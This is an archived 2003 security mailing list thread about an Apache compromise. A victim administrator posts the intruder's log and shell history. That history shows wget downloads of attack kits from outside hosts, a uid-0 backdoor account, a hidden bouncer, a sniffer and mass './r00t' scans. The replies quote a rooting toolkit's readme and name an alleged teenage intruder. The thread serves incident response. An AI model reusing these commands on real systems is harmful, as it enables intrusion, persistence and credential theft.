Mailinglist Archive: opensuse-security (334 mails)

< Previous Next >
Re: [suse-security] Apache Gain Remote Shell Access
quote from "boom.tar.gz" (see if you find somethin' that sounds familiar):

WARNING, this is a powerfull tool you can gain root access on many systems.

Use it at your own risk.

It scans for vulnerabilities in different OS and daemons:

The BIND scan:

Gains root access on all nonpatched boxes running linux with the following
bind

versions:

ISC BIND 8.2

ISC BIND 8.2.1

ISC BIND 8.2.2

ISC BIND 8.2.2-P3

ISC BIND 8.2.2-P5

ISC BIND 8.2.2-P7

The LPD scan:

Gains root access on all nonpatched boxes running linux RedHat 7.0 with lpd
from

distribution.

The FTPD scan:

Gains root access on all nonpatched boxes running the following OS/ftp
daemons:

Caldera eDesktop|eServer|OpenLinux 2.3 update [wu-ftpd-2.6.1-13OL.i386.rpm]

Debian potato [wu-ftpd_2.6.0-3.deb]

Debian potato [wu-ftpd_2.6.0-5.1.deb]

Debian potato [wu-ftpd_2.6.0-5.3.deb]

Debian sid [wu-ftpd_2.6.1-5_i386.deb]

Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm]

Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm]

Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.i586.rpm]

Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm]

Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm]

RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm]

RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm]

RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm]

RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm]

RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm]

RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm]

RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm]

RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm]

RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]

RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm]

SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm]

SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm]

SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm]

SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm]

SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm]

SuSE 7.0 [wuftpd.rpm]

SuSE 7.0 wu-2.4.2 [wuftpd.rpm]

SuSE 7.1 [wuftpd.rpm]

SuSE 7.1 wu-2.4.2 [wuftpd.rpm]

SuSE 7.2 [wuftpd.rpm]

SuSE 7.2 wu-2.4.2 [wuftpd.rpm]

SuSE 7.3 [wuftpd.rpm]

SuSE 7.3 wu-2.4.2 [wuftpd.rpm]

Slackware 7.1

The SSHD scan:

Gains root access on all nonpatched boxes running the followin versions:

Linux:

SSH-1.5-1.2.25

SSH-1.5-1.2.26

SSH-1.5-1.2.27

SSH-1.5-1.2.30

SSH-1.5-1.2.31

SSH-1.99-OpenSSH_2.2.0p1

SSH-1.5-OpenSSH-1.2

SSH-1.5-OpenSSH-1.2.2

SSH-1.5-OpenSSH-1.2.3

OpenBSD 3.x:

OpenSSH 2.9.9 - 33

The RPC scan:

Gains root access on multiple RPC vulnerabilities involving
Linus/SunOS/Solaris.

The TELNED scan:

Gains root access on all nonpatched boxes running the following OS's:

Most of the BSD OS's

The POP3 scan:

Gains root access on all nonpatched boxes running QPOP 3.0b



For further upgrades send me new exploits at k1net1c@xxxxxxxxxxx

The SSL scan:

Gains access on almost all linux boxes running OpenSSL 0.9.6d and older.

Spawns a shell uid=apache.



----- Original Message -----
From: "Radu Voicu" <suse@xxxxxxxxxxxxxxxxxx>
To: "Marco Lum" <marco@xxxxxxxxxxxxx>; "suse-security"
<suse-security@xxxxxxxx>
Sent: Wednesday, September 03, 2003 7:53 PM
Subject: Re: [suse-security] Apache Gain Remote Shell Access


> curiosity kills the cat:
>
> http://www.vulturul.org/ = A romanian guy, 18years old, his name is Brisan
> Andrei :)
>
>
>
> ----- Original Message -----
> From: "Marco Lum" <marco@xxxxxxxxxxxxx>
> To: "suse-security" <suse-security@xxxxxxxx>
> Sent: Wednesday, September 03, 2003 7:43 PM
> Subject: [suse-security] Apache Gain Remote Shell Access
>
>
> > Help, Help, Somebody help!!!
> >
> > I Found somebody gain access using wwwrun, Download programs and try to
> > hack into other server.
> >
> > Follows found in error_log of apache
> >
> > --09:41:10-- http://www.vulturul.org/vulturul/vulturu.tgz
> > => `vulturu.tgz'
> > Resolving www.vulturul.org... done.
> > Connecting to www.vulturul.org[195.110.124.188]:80... connected.
> > HTTP request sent, awaiting response... 200 OK
> > Length: 9,432 [application/x-tar]
> >
> > 0K ......... 100%
> > 13.69 KB/s
> >
> > 09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]
> >
> >
> > bind: Address already in use
> > bind: Address already in use
> > --09:33:57-- http://geocities.com/supers7ar/bin.tar.gz
> > => `bin.tar.gz'
> > Resolving geocities.com... done.
> > Connecting to geocities.com[66.218.77.68]:80... connected.
> > HTTP request sent, awaiting response... 200 OK
> > Length: 19,748 [application/x-gzip]
> >
> > 0K .......... ......... 100%
> > 65.37 KB/s
> >
> > 09:33:59 (65.37 KB/s) - `bin.tar.gz' saved [19748/19748]
> >
> > sh: line 1: ./bin.tar.gz: Permission denied
> >
> > gzip: stdin: not in gzip format
> > tar: Child returned status 1--15:50:22-- http://195.174.78.202/a.out
> > => `a.out'
> > Resolving 195.174.78.202... done.
> > Connecting to 195.174.78.202:80... connected.
> > HTTP request sent, awaiting response... 200 OK
> > Length: 13,444 [text/plain]
> >
> > 0K .......... ... 100%
> > 3.37 KB/s
> >
> > 15:50:27 (3.37 KB/s) - `a.out' saved [13444/13444]
> >
> > sh: line 1: ./a.out: Permission denied
> > chmod: invalid mode string: `x'
> > sh: line 1: ./a.out: Permission denied
> > Bad syntax, perhaps a bogus '-'?
> >
> > sh: line 1: cd: /tmp/vulturu: No such file or directory
> > --20:25:35-- http://www.vulturul.org/vulturul/vulturu.tgz
> > => `vulturu.tgz'
> > Resolving www.vulturul.org... done.
> > Connecting to www.vulturul.org[195.110.124.188]:80... connected.
> > HTTP request sent, awaiting response... 200 OK
> > Length: 9,432 [application/x-tar]
> >
> > 0K ......... 100%
> > 13.67 KB/s
> >
> > 20:25:38 (13.67 KB/s) - `vulturu.tgz' saved [9432/9432]
> >
> >
> > tar: Error exit delayed from previous errors
> >
> > sh: line 1: cd: /tmp/": No such file or directory
> >
> >
> > Also Found his command history:
> >
> >
> > id
> > /usr/sbin/adduser vulturul -u0 -g0 -M;
> > cd /usr/local/games/
> > ls -ax
> > wget www.vulturul.org/vulturul/bnc.tgz
> > cd /tmp/" "
> > socklist
> > killall -9 nsl
> > ls -ax
> > rm -rf epcs2
> > rm -rf ns
> > rm -rf nsl
> > rm -rf p
> > rm -rf pk
> > ls -ax
> > wget www.vulturul.org/vulturul/bnc.tgz
> > tar xvfz bnc.tgz
> > mv psybnc "~. "
> > cd "~. "
> > mv psybnc " "
> > export PATH=:PATH
> > ./" "
> > id
> > ls --color
> > ./li
> > ls --color
> > ./p
> > exec ./p 8003
> > id
> > pwd
> > cd ..
> > cd ..
> > ls -ax
> > ls -ax --color
> > rm -rf edu.gz
> > rm -rf local.tar.gz
> > rm -rf local
> > cd 3du
> > ls --colorls --color
> > ./scan 200.13.230.37
> > ./scan 200.13.230.37 -d 6
> > ./scan 202.30.198.226 -d 6
> > /scan 202.186.250.157
> > ./scan
> > ./scan 202.186.250.157
> > ./scan 202.186.250.157 -d 6
> > ./scan 64.106.104.84 -d 6
> > ./scan 64.106.104.84 -d 6
> > ./scan 128.119.213.136 -d 2
> > d ..
> > cd ..
> > ls -ax
> > cd atd
> > ls -ax
> > ./osslmass2 mass.log
> > ./osslmass2 mass.log
> > cd ../atd
> > ls -ax
> > cd ..
> > ls -ax --color
> > pico
> > ./pico
> > mv pico /usr/bin
> > pico
> > ls -ax
> > mv pico /usr/bin
> > cp pico /usr/bin/pico
> > cd 3du
> > ls -ax --color
> > cd ..
> > wget http://geocities.com/supers7ar/boom.tar.gz
> > tar xvfz boom.tar.gz
> > cd boom
> > ls -ax
> > ./r00t./r00t -t 193.231.142 -d 3
> > ./r00t -t 193.231.142 -d 2
> > ./r00t -t 193.231.142 -d 4
> > ./r00t -t 193.231.142 -d 7
> > ./r00t -t 193.231.142 -d 8
> > cd ..
> > pwd
> > wget http://geocities.com/supers7ar/sshup.tar.gz
> > tar xvfz sshup.tar.gz
> > cd ssh-3.0.1/
> > ls -ax
> > cd ..
> > rm -rf ssh-3.0.1/
> > rm -rf sshup.tar.gz
> > ls -ax --color
> > rm -rf boom.tar.gz
> > cd ~.
> > cd " ~.
> >
> > q
> >
> > q
> >
> > }
> >
> > q
> >
> > exit
> >
> > ls -ax
> > wget www.vulturul.org/vulturul/linsniffer
> > chmod +x linsniffer
> > ./linsniffer
> > ls -ax
> > rm -rf linsniffer
> > ls -ax --color
> > id
> > ./heh
> >
> > ./r00t -t 128.100.20 -d 8
> > ./r00t -t 193.231.142 -d 3
> > ./r00t -t 193.231.142 -d 2
> >
> > ./scan 200.13.230.37
> >
> > Please help, I Can't found where he can get in~~!
> >
> > --
> > Marco Lum
> > Net Service Manager
> >
> >
>
____________________________________________________________________________
> _______________
> > System Development Service
> > Inter/Intra/Local-Area Networking Service
> >
> > VOICE: +852 2851 1190
> > FAX : +852 2851 1109
> > Email: enquiry@xxxxxxxxxxxxx
> > WWWeb: http://www.hkservice.com
> >
> > HK Service Company
> > HK Service Consultants Limited
> >
> >
> >
> >
> > --
> > Check the headers for your unsubscription address
> > For additional commands, e-mail: suse-security-help@xxxxxxxx
> > Security-related bug reports go to security@xxxxxxx, not here
> >
> >
>
>
>
> --
> Check the headers for your unsubscription address
> For additional commands, e-mail: suse-security-help@xxxxxxxx
> Security-related bug reports go to security@xxxxxxx, not here
>
>



< Previous Next >
References